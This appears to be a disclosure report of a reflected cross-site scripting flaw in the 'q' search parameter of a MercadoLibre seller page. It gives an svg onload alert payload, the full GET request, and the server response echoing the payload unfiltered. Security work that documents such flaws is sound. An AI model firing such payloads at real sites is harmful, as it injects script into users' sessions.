The vulnerable parameter is "q" and the exploitation is through GET method. The attach works with the parameter "type" set in:
* type=recent * type=archived
Example:
https://myaccount.mercadolibre.com.ar/sales/list#type=recent&q="><svg/onload=alert(8)>
Request:
GET /sales/cartSearch?type=recent&q="><svg/onload=alert(8)> HTTP/1.1 Host: myaccount.mercadolibre.com.ar User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://myaccount.mercadolibre.com.ar/sales/list X-NewRelic-ID: XQ4OVF5VGwIIUFZQAQUB X-Requested-With: XMLHttpRequest
Response:
<form data-component="actions-search" class="form-search" onsubmit="return false;">
<div id="iePlaceHolder" class="ie-place-holder">Comprador o venta</div>
<input type="text" id="search" name="search" class="txt-search" placeholder="Comprador o venta" value="">
<svg/onload=alert(8)>
<input type="button" id="searchBtn" value="Buscar" class="ch-btn-skin ch-btn-small">
</form>
We can see how the server does not filter the special characters correctly, which allows a malicious user to inject arbitrary code. The "svg" tag entered is embedded within the response of the server, allowing the exploitation of this vulnerability